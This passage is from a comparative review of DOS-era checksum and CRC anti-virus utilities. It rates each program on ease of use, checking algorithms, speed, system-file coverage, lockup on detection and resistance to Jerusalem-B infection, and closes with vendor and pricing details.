CHECKUP uses this approach. It scans and +compares every byte of the target files on a block-by-block basis. +If the recorded file sizes, any of the block CRC comparisons, or +the CRC totals do not match, CHECKUP alerts users that the +target files have been altered. + +Another approach to the problem is to compute the check in two +different ways. For example, if both a checksum and a file size +were to be calculated and recorded for later comparison, it is +unlikely that a virus could be modified without mismatching on +one of the comparisons. Or if checksums were to be calculated +using two different algorithms, the virus would again likely fail +to fool both techniques. + +Thus if some future virus were to compute checksums prior to +infections, pad their viral code with characters that maintain +checksum integrity and then infect, CHECKUP could catch it. + + + + STEALTH VIRUSES + + +A stealth virus is able to defeat a checksum program if it loads +into memory before the checksum program runs. The stealth +virus can then detect the checksum program as it attempts to +read each program on the disk, and before letting the checksum +program see the file it is trying to read, extracting the virus +from it. After the checksum program is satisfied that there is no +virus in the file, the virus in memory can re-insert it into the +file just checked. + +Such a problem can be easily avoided: simply boot the system +from an uninfected floppy, then run your checksum program +from it. + +In the tables presented here, space has been provided for you to +rate an additional product. + + + + PRODUCT COMPARISONS + + + + + EASE OF USE + + +Conducting these evaluations was not easy. In the table below, I +record my joy or frustration in trying to master the program. + + Alert + + This program makes claims of ease of use, with a + pop-up, drop-down menus, mouse support, nifty sound + effects, and the like. 
But the blinking text on the + screen will certainly drive you crazy, if you are still + sane after waiting, Alert would like to run McAfee's + scan every time you add a file to the list it will check; + it doesn't accept wild cards, so if you thought you + would do a checksum on all of your files, assume that + you won't be able to install it in less than a week. + Installation and simple evaluation took 53 minutes. + + The Antibody Test + + Antibody's installation is extremely easy, if it works. + You cannot simply copy the files to your hard disk -- + you must let Antibody do it for you. In the process, + Antibody wants to check the integrity of your + distribution disk. If you have any alien file on this + disk, Antibody will abort after 3 or 4 minutes of + self-examination. Beat the system by clearing the + read-only and hidden attributes of SIGNATURE.DAT, + then rename it. Antibody will create a new file for you + and proceed. The manual includes a comprehensive list + of error messages and their meanings. + + BSearch + + No installation required! Copy BSEARCH.EXE to + anywhere on your hard disk, and run it with the + obvious wildcards. For example, BSEARCH C:\*.* will + examine everything. + + CHKSUM + + Simply copy to anywhere on your hard disk and enter + "CHKSUM". You'll be prompted for what you should + have entered. + + Checkup + + The most difficult of all the packages reviewed here. + Documentation spans five files, and numbers almost + 100 pages. With such a mass of instructions, you are + unlikely to have any success in installing the program. + The verbosity extends to the log file, which you can + create to record any file mismatches. The log file for a + single run on 183 files was 270K - nearly 2K per file. + Should you try to use the product on a large hard disk, + your log would be worthless. + + CRCDOS + + As with CHKSUM, simply copy to anywhere and go! + Instructions will appear on the screen if you simply + enter "CRCDOS." 
+ + Delouse + + It took just four minutes to completely understand how + Delouse works and to begin building the file of CRC + values. Installation is nothing more than copying a few + files to anywhere on your hard disk. Delouse can also + be run from a floppy. + + The Detective + + Copy and go. When first run, the program pops up a + simple menu that works very well. You'll be asked + what drives to process and what file extensions to + check. Entering * will process everything. You'll be + asked if you also wish to scan for viruses (meaning to + compute CRCs) as you produce the file list for + subsequent checks. Also, The Detective keeps itself + up-to-date with each run. On every run, the most + recent signatures are copied to the "old" list, and new + signatures are computed for comparison. + + F-Prot + + Copy F-OSCHK to any location on your hard disk and + enter F-OSCHK. It will display five numbers which are + encrypted checksums of the partition table, boot record, + and three operating system files. AUTOEXEC.BAT can + then be given a line beginning with (path) F-OSCHK + and followed by these five values. + + FICHECK + + Seemingly easy to use. Can be run from a menu or as a + command line in a batch file. However documentation + for the command line operation is poor, and misleading. + + Module Integrity Check + + Copy the file MIC to anywhere on your hard disk and + enter MIC. There are no menus, nothing to select. + You'll create a list of CRCs, if none exists, in your root. + If one exists, it will be renamed "OLD", and another + will be created. The two will be automatically + compared. You'll be notified of any changes, any added + files, and any deleted files. You'll also be notified if + nothing has changed. All information is automatically + sent to reports in the root. Nothing could be simpler. 
+ + Novirus + + Copy the program to anywhere on your hard disk, and + it makes a hidden file in the root containing what it + claims is encrypted CRC, file date, time, and size + information for each of the three system files. + Installation and use are very easy. + + SSCRC + + Very easy. Copy the file to your hard disk, and run the + program. Onscreen instructions tell you to enter /F to + create the File of CRCs or /C to Check files against + these CRCs. Requires ANSI.SYS + + Validate + + Very easy to use for finding the CRC of a single file. + Simply copy VALIDATE to your drive, and run it. + Impossible to use for checking the CRCs of all files, as + it does not work with a list, does not accept wildcards, + and will not compare current CRC with stored CRC. + + VCheck + + Fairly straightforward. You may need to follow the + example in the manual to guess the spacing required + for parameters in the command line. Results are + displayed on your screen, and you'll need to press a key + to continue scanning, after the screen fills. This + ensures you'll spot a surprise change in a file, but + doesn't deliver the kind of power that suits it for a + batch file. Not menu-driven. + + VirusGuard + + Simply type INSTALL. VirusGuard will install itself on + your hard disk and scan all COM and EXE files for + their signatures. It will also modify your + AUTOEXEC.BAT to automatically invoke RAMWATCH + on subsequent boots. Our copy of the program did not + come with documentation, however, so we are a bit + limited in our review here. + + + + NUMBER OF TECHNIQUES + + + +The program should compute checksums using two different +approaches, or compute both file size and checksum, to ensure +that a virus doesn't modify a file in such a way that the +checksum isn't changed. Gilmore Systems has a program called +PROVECRC that creates a modified version of a file that is +different, but that has the same CRC as the original. 
The +program proves that a single CRC is not fool-proof for virus +detection, for it is possible to write a virus -- much like they +wrote PROVECRC -- which can add code to your programs +without changing the CRC. When two algorithms are used, +PROVECRC creates changes undetected by one, but detected by +the other. + + Alert + + Alert uses different algorithms on different portions of + each file. A file records the results of these algorithms + in encrypted form in a file which covers all of a group + of files you wish to check. It is very unlikely that any + virus author would have the interest or patience to + break the scheme. + + The Antibody Test + + Antibody lists all files added or deleted since the last + comparison, as well as showing any changes in size, + date, time, or attributes. + + BSearch + + Stores filenames (with paths), file sizes, 16-bit and + 32-bit checksums in an indexed databases. Uses a + binary tree indexed database structure to store the files + quickly and allow even quicker searches and updates. + + CHKSUM + + Uses a single 16-bit checksum approach. + + Checkup + + Offers three different options for calculation: + table-driven incremental CRC, cumulative CRC, and + cumulative checksum. + + CRCDOS + + Uses a single 16-bit checksum approach. + + Delouse + + Uses three different checksum algorithms. All are + simple, but slightly different in the way they calculate + the checksum. One of these algorithms is chosen at + random when Delouse starts, and the method number + is recorded in a data file. You can force Delouse to + choose one of the three methods if you wish. + + The Detective + + Uses two different 16-bit CRC algorithms. + + F-Prot + + F-OSCHK uses just one algorithm. + + FICHECK + + FICHECK uses one 16-bit algorithm, MFICHECK uses + another. Both are bundled in the same package. + + Module Integrity Check + + Uses one 16-bit algorithm. 
+ + Novirus + + Appears from testing that Novirus uses no checksum or + CRC algorithm, despite the claims of its + documentation. Using a sector editor, for instance, the + word "Microsoft" was changed to "Machosoft" in + COMMAND.COM. Novirus was unable to recognize + this. I changed the attributes of the hidden system + files, and again Novirus failed to detect the change. I + renamed COMMAND.COM, infected it with Jerusalem, + and renamed it to COMMAND.COM. Novirus + recognized the change, but only because of the + increased file size. When I used NU to reduce the size + of the infected file to its original size, as listed in the + root directory, Novirus did not recognize it as a + problem. It appears that no checksumming is done, + although this is claimed in the documentation. Checks + on file existence, date, size, and time do appear to be + done. For instance, I booted, deleted COMMAND.COM, + and ran Novirus. Novirus halted the system. It also + halted the system when I used NU to increase the size + of COMMAND.COM to 999999999. + + SSCRC + + Uses one 16-bit CCITT CRC algorithm. + + Validate + + Uses two 16-bit algorithms, one of which is CCITT + CRC. + + VCheck + + Uses one 32-bit algorithm. + + VirusGuard + + Appears to use one algorithm. CRCs are encrypted. + + + + SCANNING OF CRITICAL SYSTEM FILES + + + +On an MS-DOS hard disk, there are five critical system files +that are read during the boot process: the partition table, the +boot record, two hidden system files, and COMMAND.COM. +Because many viruses take up residence in the partition table, +boot record, or COMMAND.COM, it may be desirable to check +these files on each boot. Not all CRC programs, however, can +check all of these files. Two points are awarded for each file it +can check. Note that viruses rarely touch the two hidden system +files, and many do not touch COMMAND.COM Quite a few, +however, get into the partition table of the hard disk or boot +record of floppies. 
+ + Alert + + Alert cannot examine the partition table or boot record. + It can check the other three files. + + The Antibody Test + + Antibody does not check the partition table. It does + check the other four files automatically, however. + + BSearch + + Does not scan partition table or boot record. + + CHKSUM + + Does not scan partition table or boot record. + + Checkup + + Does not scan partition table or boot record. + + CRCDOS + + Does not scan partition table or boot record. + + Delouse + + Does not scan partition table or boot record. + + The Detective + + Does not scan partition table or boot record. Further, + the evaluation version (reviewed here) will not examine + anything in the root, which is certainly the two hidden + system files and likely COMMAND.COM. + + F-Prot + + F-OSCHK scans all five files. + + FICHECK + + Automatically checks the CRC of the partition table + and the boot record, and logs this along with available + disk space and FAT ID byte. For all files checked, logs + date, time, size, attributes, and CRC, and reports any + discrepancies. Checking of hidden system files, + COMMAND.COM, etc. is at user discretion. + + Module Integrity Check + + Does not scan partition table or boot record. + + Novirus + + Does not scan partition table or boot record. + + SSCRC + + Does not scan partition table or boot record. + + Validate + + Does not scan partition table or boot record. + + VCheck + + Does not scan partition table or boot record. + + VirusGuard + + Does not scan partition table or boot record. + + + + COMPLEXITY OF CHECKING ALGORITHM + + + +A 32-bit CRC is potentially harder for a virus to beat than a +32-bit CRC; a pair of calculations is harder than a single +calculation. In this table, 10 points are awarded for the use of a +32-bit CRC or two 16-bit CRCs; 5 points for a single 16-bit CRC; +0 for no CRC. + + Alert + + Algorithm is not discussed in the documentation. 
+ However, the encrypted CRC for just one file is 748 + bytes - about 5% of the checked file's length. This + suggests that the algorithm is essentially unbreakable. + + The Antibody Test + + Algorithm is not discussed in the documentation. + However, the encrypted CRC for just each file is 128 + bytes. This suggests that the algorithm is essentially + unbreakable. + + BSearch + + Performs both 16-bit and 32-bit checksums. + + CHKSUM + + Performs CRC-16 -- 16 bit cyclic redundancy check. + + Checkup + + Performs CRC-16 -- 16 bit cyclic redundancy check. + Results are encrypted. + + CRCDOS + + Performs CRC-16 -- 16 bit cyclic redundancy check. + + Delouse + + Performs CRC-16 -- 16 bit cyclic redundancy check. + + The Detective + + Performs both 16-bit and 32-bit cyclic redundancy + checks. + + F-Prot + + Not described in documentation. Encrypts recorded + checksums. Uses only one algorithm. + + FICHECK + + Computes CRC with FICHECK, modified CRC with + MFICHECK. You can run both, if you wish, to defeat + any imaginary virus that is able to defeat one of these + approaches. + + Module Integrity Check + + Computes a checksum on part of the file. Uses only one + algorithm. + + Novirus + + Does not appear to do any CRC/checksum computation. + + SSCRC + + Uses only one algorithm -- a 16-bit CCITT standard + CRC. + + Validate + + Uses two 16-bit algorithms, one of which is CCITT + CRC. + + VCheck + + Uses one 32-bit algorithm. + + VirusGuard + + Unknown. + + + + SPEED WHEN CHECKING ALL FILES + + + +From time to time, it may be desirable to check all files on the +hard disk for changes. However, if this process takes a long +time, users will not do it as often as they should. What is the +speed of checking files? + +For our tests, we did CRC calculations on a 20Mb hard disk in a +12Mhz XT. The XT had a Norton SI of 1.8 for its computing +index, and 1.4 for its disk index, an overall performance index of +1.6 that of an IBM XT. 
It had a total of 2.3 Mb in 134 files in 19 +directories. In each case, the checksum program was run from a +floppy. Timing was done with a shareware program called +TIMER. Numbers reported here are per file. Since it is not the +number of files, but the number of bytes, that determines the +overall speed of operation, your times will vary if your files are +larger or smaller, on average, than those in the test suite. Our +average file was 18,651 bytes. So to say that scanning files took +about 2 seconds a piece is to say that the program could scan +9,325 bytes per second. A 20 Mb hard disk, full to the brim, +would take such a program 37 minutes to scan fully. If you +restricted the program to COM, EXE, OVL, BIN, SYS, and other +executable files (an intelligent restriction), you might cut this +time in half or more. + + Alert + + I could not imagine waiting while Alert checked all + files on the hard disk. Scanning just one file took 13.5 + seconds. Checking the 2.3 Mb on the test hard disk + would have taken about 17.5 minutes. This is + unacceptable. + + The Antibody Test + + Antibody is slow, but not as slow as some of the others + tested here. It took 6 minutes, 14 seconds to scan all + programs on the hard disk -- 71 files, about 5 seconds a + piece. + + BSearch + + Building the initial database of all files -- including + manuals and other files -- took BSearch 10 minutes, 35 + seconds -- about 4.7 seconds each. Then scanning + against this file took 10 minutes, 20 seconds -- about + 4.6 seconds each. + + CHKSUM + + To compare the three DOS files with CRCs previously + computed took 5.6 seconds, about 1.9 seconds each. + Testing everything in the root took 13 seconds for 8 + files, about 1.6 seconds each. + + Checkup + + To build a list of CRCs for 183 files took 9 minutes, 16 + seconds, about 3 seconds each. It took 8 minutes, 35 + seconds to use the author's proprietary "enhanced" + CRCs, about 2.8 seconds each. 
Using the checksum + approach took about 2.8 seconds each. + + CRCDOS + + To build a list of CRCs for 146 files, CRCDOS took 6 + minutes 27 seconds, about 2.6 seconds each. Testing + everything on this list took 6 minutes, 24 seconds, + again about 2.6 seconds each. + + Delouse + + To build a list of CRCs for 146 files, Delouse took 2 + minutes 38 seconds, about 1.1 seconds each. Testing + everything on this list took 2 minutes, 35 seconds, + again about 1.1 seconds each. + + The Detective + + To build a list of CRCs for 146 files, The Detective took + 3 minutes 57 seconds, about 1.6 seconds each. Testing + everything on this list took exactly the same length of + time. + + F-Prot + + Scans five system files in 10.0 seconds, 2 seconds per + file. However, F-OSCHK cannot be made to calculate + checksums on any files but these. + + FICHECK + + To build a list of CRCs for 146 files, FICHECK took 5 + minutes 27 seconds, about 2.2 seconds each. Testing + everything on this list took 5 minutes, 24 seconds, + again about 2.2 seconds each. + + Module Integrity Check + + To build a list of CRCs for 146 files, MIC took only 1 + minute 30 seconds, about .6 seconds each! Testing + everything on this list took the same length of time. + The program achieves this blazing speed by performing + a checksum only on the parts of the file that a virus is + likely to infect: the top and the bottom. + + Novirus + + Scans three system files in 1.54 seconds, .5 seconds per + file. However, cannot be made to check any files but + these, and does not appear to calculate checksums. + + SSCRC + + To build a list of CRCs for 146 files, SSCRC took 6 + minutes 27 seconds, about 2.6 seconds each. Testing + everything on this list took 6 minutes, 10 seconds, + about 2.5 seconds each. + + Validate + + To validate a selected file requires issuing the validate + command for that file, then looking the result up + on-line, from a BBS in California. Minimum time + required: perhaps 3 minutes per file. 
+ + VCheck + + To build a list of CRCs for 87 COM and EXE files, + VCheck took 1 minute 55 seconds, about 1.3 seconds + each. Testing everything on this list took 1 minutes, 25 + seconds, about 1 second each. + + VirusGuard + + To build a list of CRCs for 87 COM and EXE files, + VirusGuard took 1 minute 39 seconds, about 1.2 + seconds each. Testing everything on this list took 1 + minute, 42 seconds, again about 1.2 seconds each. + + + + EFFICIENCY IN CHECKING ALL FILES + + + +Does the program permit checking of all files with some option +such as "/ALL", or is it necessary to feed the program a list of +all the files you wish checked? The latter approach can be +grueling for any user with a large hard disk! Is there an upper +limit to the number of files that can be checked? Is the program +smart enough to check other logical drives, such as D:? + + Alert + + No. There does not seem to be any such efficiency + possible. The programwants to scan one file at a time, + and add one at a time to its list. Alert can only manage + a list of about 200 files. Alert does not know that + viruses do not inhabit documentation, and is likely to + begin by scanning its own manual! Creating a list to be + checked is very labor-intensive. + + The Antibody Test + + Antibody automatically scans the entire hard disk upon + installation. It can manage about 3900 file signatures. + Antibody ignores drives D:, E:, etc., however. + + BSearch + + There is no upper limit to the number of files that can + be checked. Ignores D:, E:. As with Antibody, BSearch + can be called from a batch file that scans specified + drives, directories. Output showing changes can be + routed to the printer, if this is desired. + + CHKSUM + + Power is about equivalent to BSearch. You can do + almost anything with batch files, but you will need to + be a bit handy with an ASCII editor to do so. You'll + need to specify if you want CHKSUM to look at D: for + you. 
There is no limit on the number of files that can + be checked. Unlike BSearch, CHKSUM will not look at + subdirectories of the specified target, unless you tell it + to. + + Checkup + + Checkup simply processes everything on your hard + disk, and does not work from any input list. There is + no upper limit on the number of files that can be + scanned, other than your patience. Checkup is happy to + point out that files have been changed, when they + haven't been. This occurs because Checkup creates one + X.XUP for every file beginning with X. Thus the + signature for X.BAT is stored in X.XUPand the + signatures for X.COM, X.SYS, X.BAK, etc. are + compared with the contents of this file. With perhaps + 10% of such "claims" wrong, you will lose patience with + it quickly. Checkup gets a 10 for efficiency, a 0 for + accuracy. + + CRCDOS + + CRCDOS will process an ASCII list of files you give it, + a list you can create by entering CHKDSK *.* /v >> + filelist You can then feed CRCDOS this list with a + command such as CRCDOS -m crclist filelist. There is + no upper limit on the number of files that can be + scanned. D: and other drives are ignored unless + CRCDOS is told to work them over. Like CHKSUM, + CRCDOS will not automatically look at subdirectories + of the specified target, unless you tell it to. + + Delouse + + Much like CRCDOS. Delouse will process an ASCII list + of files you give it, a list you can create by + entering CHKDSK *.* /v >> delouse.dat You can then + feed Delouse this list with a command such as + DELOUSE MAKE. This creates a file DELOUSE.CHK + file, used during checking. To check, you enter + DELOUSE CHECK. There is no upper limit on the + number of files that can be scanned. D: and other + drives are ignored unless Delouse is told to work them + over. Like CHKSUM and CRCDOS, Delouse will not + automatically look at subdirectories of the specified + target, unless you tell it to. + + The Detective + + Intelligent menu-driven design. 
Prompts for drives, file + extensions. It is easier (and more sensible) to make it + simply check everything than to be selective. + + F-Prot + + Very efficient, but scans only the five system files. + + FICHECK + + Intelligent menu-driven design. Prompts for drives, file + extensions. It is easier (and more sensible) to make it + simply check everything than to be selective. Some + selectivity (with *.COM, *.EXE, etc.) is easy; other + selectivity (specific files) is harder to do. + + Module Integrity Check + + Checks all files automatically. Processes only the + current logical drive. Cannot be made to scan + selectively. Creates all reports, as disk files, + automatically. Because it is so fast, we award nearly + full points here. + + Novirus + + Cannot be made to check multiple drives. Cannot be + made to check files other than the three system files. + + SSCRC + + There is no upper limit to the number of files that can + be checked. Ignores D:, E:. As with Antibody and + BSearch, can be called from a batch file that scans + specified drives, directories. Output showing changes + can be routed to the printer, if this is desired. + + Validate + + No. There does not seem to be any efficiency possible. + The programwants to scan one file at a time, and is + unable to compare its results with anything in a list of + recorded checksums. + + VCheck + + Checks all COM and EXE files automatically. Processes + whatever logical drive you specify on the command line. + Cannot be made to scan selectively. Cannot be made to + scan SYS, BIN, OVL, or other files that might become + infected. Creates all reports, as disk files, + automatically. + + VirusGuard + + Checks all COM and EXE files automatically. Processes + whatever logical drive you specify on the command line. + Cannot be made to scan selectively. Cannot be made to + scan SYS, BIN, OVL, or other files that might become + infected. 
If a file is changed, the machine pauses + during signature checking, with the message "X.X has + been modified. Press F1 to acknowledge." + + + + USER CONTROL OF FILES TO BE CHECKED + + + +Because checking all files can take some time, users may wish to +provide the program with a list of files to be checked. Can this +be done? Can the user use their text editor or other convenient +tool to build the file list? + + Alert + + Yes. Users select those files they wish to check, via + menu. The menu system can be used to build a file list + for subsequent use. The file list is encrypted and not + editable with any program other than Alert, however. + + The Antibody Test + + No. Antibody cannot be given a short list. You may add + to its understanding of what should be checked, but + cannot subtract. + + BSearch + + You can only list by file type and directory. Thus you + can specify all COM files within each of 4 directories, + all EXEs within another 2 directories, etc. Each + instruction is offered on a separate command line, and + can be run from a batch file. The database cannot be + edited with most word processing programs, however. + + CHKSUM + + Building the list of files to check can be done easily by + redirecting the program's output (">>") to a file, then + editing this file into a batch file. + + Checkup + + No control. + + CRCDOS + + Extremely easy to use here. Hand CRCDOS a list of + files, and it builds a list of CRCs for those files. Hand + it this list, and it compares current and stored CRCs + for changes. + + Delouse + + A bit easier than CRCDOS, even, in that file names to + scan and to compare are hard-coded, so the command + line is simpler: you only need to enter "Delouse Make" + or "Delouse Check" + + The Detective + + The user controls the drive(s) to check, and the file + extensions to check, but cannot control the directories + to check or provide a list of specific files. 
+ + F-Prot + + The user can choose to not check any of the five system + files. But the user cannot get F-OSCHK to scan any + other files than these. + + FICHECK + + The user controls the drive(s) to check, and the file + extensions to check, but cannot control the directories + to check or provide a list of specific files. + + Module Integrity Check + + MIC is so fast that it doesn't make any sense to + attempt to force it to scan selectively. Let it scan + everything. You're done. MIC is certainly the easiest to + use, most efficient of all the programs described in this + chapter. + + Novirus + + Offers no control over the checking process. Takes only + one command line - /I makes it start over with a new + database of information on the three files. + + SSCRC + + Offers no control over the checking process other than + permitting scan of a directory, rather than the entire + drive. + + Validate + + You can make it scan any file in any directory. But + scanning two files requires two commands. Not + practical for real-life. + + VCheck + + Offers no control over the checking process other than + permitting scan of a directory, rather than the entire + drive. + + VirusGuard + + VirusGuard is so fast that it doesn't make any sense to + attempt to force it to scan selectively. Let it scan + everything. You're done. MIC is certainly the easiest to + use, most efficient of all the programs described in this + chapter. + + + + ADDING SELF-CHECKING TO FILES + + + +The most efficient approach to checking files is not to check only +critical files, or all files, but rather to check files as they are +run. This checking can be done with either code which is added +to each file, or with a memory-resident driver, that monitors file +access. + +Adding code to a file is the idea of "vaccination." 
The file is +modified so that when it is run, control is first passed to the +appended code, which then calculates the checksum of the file +with the checksum that was stored in that file at the time of +vaccination. A failed comparison can result in an alert to the +user. + +There are a few drawbacks to the approach. It slows processing +a small amount, it enlarges each file a small amount, it may not +work on COM files that are nearly 64K in size, since 64K is the +largest size supported by the COM format; it cannot work with +BIN, SYS, and OVL files; it cannot work with archived, +self-extracting EXE files, and so on. While some authorities, +such as Rich Levin, view such approaches as substantially +flawed, we are unconvinced. + + Alert + + This feature is not offered. + + The Antibody Test + + This feature is not offered. + + BSearch + + This feature is not offered. + + CHKSUM + + This feature is not offered. + + Checkup + + This feature is not offered. + + CRCDOS + + This feature is not offered. + + Delouse + + This feature is not offered. + + The Detective + + This feature is not offered. + + F-Prot + + The F-Prot package includes F-XLOCK, a program that + can make any other COM or EXE self-checking. + Entering F-XLOCK *.* will protect all COM and EXE + files in the current directory. When infected, the + program will hang the system and report "THIS + PROGRAM HAS BEEN INFECTED!" and the system + hangs. + + FICHECK + + This feature is not offered. + + Module Integrity Check + + This feature is not offered. + + Novirus + + This feature is not offered. + + SSCRC + + This feature is not offered. + + Validate + + This feature is not offered. + + VCheck + + This feature is not offered. + + VirusGuard + + This feature is not offered. + + + + OPTIONAL SYSTEM LOCKUP ON DETECTION OF +MODIFICATION + + + +Many things can modify a program: a virus, a hacker, an error +in using a sector editor. If a program has been modified, do you +want to try to run it? 
The smart money says no, let's stop right +now and see what has happened here. Running any program +that contains a virus is certain to spread the virus. It might be +desirable if the system is able to prevent any modified program +from running. + + Alert + + You are given ample warning about what files have + been modified. The warning is both auditory and + visual, and the screen requires you to press a key after + reading what has happened. The warning may not be + accurate, however. I swapped the names of two test + files, and Alert was unable to find one, told me the + other was the wrong size. Both, in fact, were where + they had been, but were completely modified. Further, + the warning on the screen tells the user to consult the + manual, rather than telling the user what to do next. + + The Antibody Test + + The log shows what has changed, and how. Optionally, + you may ask the program to display any text in any + file which has been changed since the last check. + However, there is no system lockup if a modification is + detected, nor are there any audible warnings. + + BSearch + + The log shows what has changed, and how. There is no + system lockup if a modification is detected. A faint beep + can be heard when any change is detected. + + CHKSUM + + Upon detecting a changed file, CHKSUM beeps and + displays a message. But it doesn't pause in its labors, + and the result of a massive infection is likely to go + scrolling off the screen. No lockup takes place on + mismatches. + + Checkup + + The documentation indicates that the system can be set + to lockup upon detection of a mismatch. We were not + able to create this effect on our test machine, however. + Further, although the documentation claims to permit + production of a log file, we were not able to do this. + Our copy was downloaded from the author's BBS. + + CRCDOS + + There is an extensive screen message whenever a + change is detected, but the system does not beep. 
No + lockup takes place on mismatches, either. + + Delouse + + There is a modest screen message whenever a change + is detected, but the system does not beep. No lockup + takes place on mismatches, either. + + The Detective + + You won't get a beep or message on the screen. A + report, sent to disk or your printer, lists the files that + have been added, deleted, or changed since the last run + of The Detective. Far too subtle for most users. + + F-Prot + + If any of the programs in the F-Prot package becomes + infected with any virus, or changed in any way, it + reports "THIS PROGRAM HAS BEEN INFECTED!". If + any program is protected with F-XLOCK, it will then + hang the system. + + FICHECK + + You won't get a beep or message on the screen. A + report, sent to disk or your printer, lists the files that + have been added, deleted, or changed since the last run + of FICHECK. Changes noted can include size, date, + time, crc. If the report is not requested, or not + requested correctly, or sent to disk, users may not + become aware of virus-induced changes. + + Module Integrity Check + + You get several very nice reports, automatically placed + in your root, showing files removed, added, and + changed since the last run. If a file has been changed + for any reason, MIC will tell you, and will tell you to + read the change report. + + Novirus + + If Novirus does manage to find a problem with a + change in the time, date, size or presence of one of your + three system files, it will halt the system and display a + full-screen warning message. + + SSCRC + + You won't hear a beep. You might see a notice go past + on the screen when a changed file is found. At the end + of the scan, you'll see a summary table, including a row + showing number of files failing CRC. Their names are + listed at the top of REPORT.CRC, placed in the root. + Your batch file that invokes SSCRC could send this + report to the printer, if you wished. There is no system + lockup. 
We might want this less subtle. + + Validate + + Because Validate makes no comparison with + pre-recorded CRCs, it cannot know if there is a + problem with a file. It is happy to scan infected files + and report their CRCs. + + VCheck + + You won't hear a beep. You will see a list, on screen, of + exactly which COM and EXE files have different CRCs + or sizes. Their names can be listed in a report you + create, which can be sent to the printer. There is no + system lockup. + + VirusGuard + + No beeps. But you'll see the changed program listed on + the screen, with the message that it has been modified. + You'll need to tap a key to remove the message from + the screen. There is no system lockup, and no hard + copy report or file of changes is created. + + + + SELF-PROTECTION OF CHECKSUM PROGRAM + + + +If a checksum program becomes infected, it then puts the virus +into memory before it begins to run. A stealth virus in memory +is able to remove itself from any file as the file is checksummed, +preventing the checker from finding the virus. Thus we need +some notification that the checksum program has been infected. +Ideally, the checker reports that it has been infected and quits +running. + +To test this, we infected each checker with Jerusalem-B, and +tried running it. + + Alert + + Alert runs no worse with an infection than without one, + and never seems to notice that it has become a carrier + of Jerusalem. + + The Antibody Test + + As with Alert, Antibody runs just fine after infection. + + BSearch + + As with Alert and Antibody, BSearch runs just fine + with a Jerusalem infection. + + CHKSUM + + Runs well when infected. + + Checkup + + Runs as well when infected as when not infected -- + poorly. + + CRCDOS + + Runs well when infected. + + Delouse + + Runs well when infected. + + The Detective + + Runs well when infected. + + F-Prot + + F-OSCHK reports that it has been infected. F-XLOCK + reports that it has been infected, and hangs the + system. 
+ + FICHECK + + Runs well when infected. Includes an option to + self-check for virus infection. The self-check works. + After a few moments, it will report "Error - This + program has been altered or tampered with!" However, + the user must invoke this option deliberately and + manually. + + Module Integrity Check + + Runs well when infected. + + Novirus + + Runs well when infected. + + SSCRC + + Runs well when infected. + + Validate + + Runs well when infected. + + VCheck + + Runs well when infected. + + VirusGuard + + Runs well when infected. + + + + VENDOR INFORMATION + + + + o Alert. Version 2.20, available from the NCSA BBS as + ALERT220.ZIP. Also available from Robert W. Reed, + 3858 Waterview Loop, Winter Park, FL 32792. Price: + $25 each for 1-10 licensees. + + o The Antibody Test, version 1.03B. Available from + the NCSA BBS as ANTIBODY.ZIP. Also available at + no charge from Commander, TRADOC, ATTN: ATIS-S + (Major Richard W. Adams), Ft. Monroe, VA + 23651-5000. + + o BSearch. "If you find BSearch of value, a contribution + of $10 would be helpful." Available from the NCSA + BBS as BSEARCH.ZIP, or from David Harris, POB + 2058, El Paso, TX 79951. + + o CHKSUM is available from the NCSA BBS in a file + called CHKSUM.ZIP. It is also available from its + author, Bob Taylor, 8602 Woodlake Drive, Richmond, + VA 23229. The author does not request a contribution. + The package includes C source code. + + o Checkup v. 3.9 (Levin) "This is not free software. + You are granted a limited license to evaluate this + program for ten days in your home or office. If you + continue to use this program, you must register with + the author. Registration fees are $24.95 per copy for + home users and $49.95 per copy for office users." + Available from the NCSA BBS as CHKUP39.ZIP or + from Richard B. Levin, POB 14546, Philadelphia, PA + 19115. + + o CRCDOS version 1.0. Available from the NCSA BBS + as CRCDOS.ZIP. This ZIP file includes C source + code. Written by R.E. 
Faith, January 11, 1988. + Released to the public domain, on condition that no fee + be charged for distribution, that authorship information + concerning source and any modifications will be + retained, and that the code is not included as part of a + commercial package. + + o Delouse version 0.9 Available from the NCSA BBS as + DELOUSE.ZIP. Written by Phillip M. Nickell, February + 28, 1988. Includes Pascal source code. No fee is + requested. No copyright is taken. Appears to be public + domain. Thanks, Mr. Nickell! + + o The Detective version 1.2 Available from the NCSA + BBS as DETECT.ZIP. "The free version of The + Detective is expressly prohibited for use in commercial, + educational, and governmental institutions except for + the purpose of evaluation." The price per computer, if + you choose to register, is $25 for 1-50 computers, and + less with more. You may order the current version from + PC Solutions, POB 742, Mequon, WI 53092. (414) + 241-9119. The shareware version, distributed via + bulletin boards, is unable to process files in the root + directory. + + o F-Prot, version 1.12, is available from the NCSA's BBS + as FPROT112.ZIP. Version 1.12 of this package + contains a large number of extremely useful anti-virus + tools. From the standpoint of the present review, only + two are relevant, however: F-XLOCK (which permits all + programs to check for CRC changes as they are + executed) and F-OSCHK (which checks the partition + table, boot record, two hidden system files, and + COMMAND.COM) F-Prot is available from Fridrik + Skulason, Box 7180, IS-127 Reykjavik, Iceland. Pricing: + Skulason suggests $15 for 1-7 computers, and lower + payments on larger volumes. + + o FICHECK, version 5.0, comes bundled with + MFICHECK 5.0 and PROVECRC ver 1.0. It may be + downloaded from the NCSA BBS as FICHECK5.ZIP. It + is available from the author, Chuck Gilmore, Gilmore + Systems, POB 3831, Beverly Hills, CA 90212-0831. + Pricing: "A 30 day trial period is granted. 
Afterward, + you may either order one of the commercial versions or + destroy the evaluation copies." Two commerical + versions are available: XFICHECK (eXtended + FICHECK) for $15 and PFICHECK (Professional + FICHECK) for $20. + + o Module Integrity Check, version 1.0, is available + from the NCSA BBS in a file called MIC10.ZIP. + Pricing: "This program may be used by anyone free of + charge... Anyone who finds this program of value is + encouraged to make a voluntary donation to the + author... Even if you do not make a donation you are + still free to use this program as you see fit." Author: + Steve Leonard, 260 Dunbar Road, Hilton, NY 14468. + + o Novirus version 3.0, accompanied by documentation + for version 2.0, is available in a file called + NOVIRUS3.ZIP on the NCSA BBS. It is also available + from the Interconnect BBS, 703-827-5762. Author: + Jeffrey Morley. Price: free. + + o SSCRC, version 1.4, is available in a file called + SSCRC.ZIP from the NCSA BBS. Pricing: "If you use + this utility to protect your system, do the right thing + and send us $10", says the author. It is available from + OSR, 561 Blaxland Road, Eastwood, 2122, NSW, + Australia. + + o Validate, version 0.3, is available in a file called + VALIDAT3.ZIP from the NCSA BBS. It is also + available at no charge from Computer Virus Industry + Association, 4423 Cheeney St., Santa Clara, CA 95054. + (408)-727-4559. Price: free. + 